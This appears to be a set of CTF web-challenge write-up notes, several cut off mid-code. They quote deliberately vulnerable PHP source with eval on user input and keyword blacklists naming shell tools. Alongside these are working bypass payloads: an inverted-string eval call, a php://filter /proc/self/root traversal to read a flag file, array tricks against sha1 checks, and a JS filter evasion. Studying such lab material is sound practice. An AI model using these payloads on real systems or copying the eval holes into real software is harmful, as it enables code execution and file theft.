[ISITDTU 2019]EasyPHP
<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');

eval($_);
?>
payload:
(~%8F%97%8F%96%91%99%90)();
[极客大挑战 2020]Greatphp
Deserialization
<?php
error_reporting(0);
class SYCLOVER {
    public $syc;
    public $lover;

    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
            if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
                eval($this->syc);
            } else {
                die("Try Hard !!" ...
EasyBypass
<?php
highlight_file(__FILE__);

$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];

if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
    $comm1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2)) ...
[SCTF2019]Flag Shop
Something new
Ruby injection
I thought it was JS at first
I originally planned to brute-force the JWT, but there was a robots.txt, and its hint led me to the source code.
require 'sinatra'
require 'sinatra/cookies'
require 'sinatra/json'
require 'jwt'
require 'securerandom'
require 'erb'

set :public_folder, File.dirname(__FILE__) + '/static'

FLAGPRICE = 1000000000000000000000000000
ENV["SECRET"] = SecureRandom.hex(64)

configure do
  enable :logging
  file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")
  file.sy ...
[WMCTF2020]Make PHP Great Again
require_once bypass; I just took a payload found online.
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
How it works:
https://www.anquanke.com/post/id/213235
[极客大挑战 2020]Roamphp1-Welcome
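After poking around I found nothing, so I captured the request and saw that GET is not allowed; switching to POST returned the source code.
Bypassing the sha1 strict-equality check. Passing arrays is enough to bypass it.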
roam1[]=1&roam2[]=2
[MRCTF2020]Ezaudit
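Opening it shows a site that looks like some kind of official website.
After poking around with no result, I ran a scan and found www.zip.
It contains index.php, so I had the source code:
<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // If empty, treat it as not filled in: show an error and return to the login page after 3 seconds
        header('refresh ...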
[GXYCTF2019]StrongestMind
Writing a Python script
Adjusted as I typed it:
import time
from requests import *
import re

url="http://5ee91e70-c1b8-4921-84fb-34dda71ee977.node4.buuoj.cn:81/"
s=session()
res = s.get(url=url)
res.encoding = "UTF-8"
for i in range(1001):
    print(res.text)
    match=re.findall("<br>(.*)<br>",res.text)
    # print(match)
    # print(match[0])
    rem=re.findall("<br>[0-9].*<br>",match[0])
    text=rem[0].replace("<br>","")
    # print(rem[0].replace(" ...
[HFCTF2020]JustEscape
I don't know JS, so I'm leaving this one as a TODO.
Visit run.php
<?php
if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) {
    $code = $_GET['code'];
    echo eval(code);
} else {
    highlight_file(__FILE__);
}
?>
nodejs
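Basically it uses an existing PoC; because certain keywords are filtered, JS language features are used to get around the keyword filter.
prototype becomes `${`${`prototyp`}e`}`${`${`prototyp`}e`}`p`,`r`,`o`,`t`,`o`,`t`,`y`,`p`,`e`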
https://z3ratu1.github.io/%5BHFCTF2020%5DJustEscape.html
https://blog.csdn.net/qq ...
[BJDCTF]2020EzPHP
F12
Base32 decode
1nD3x.php
Source code:
<?php
highlight_file(__FILE__);
error_reporting(0);

$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';

echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";

if($_SERVER) {
    if ( preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec ...
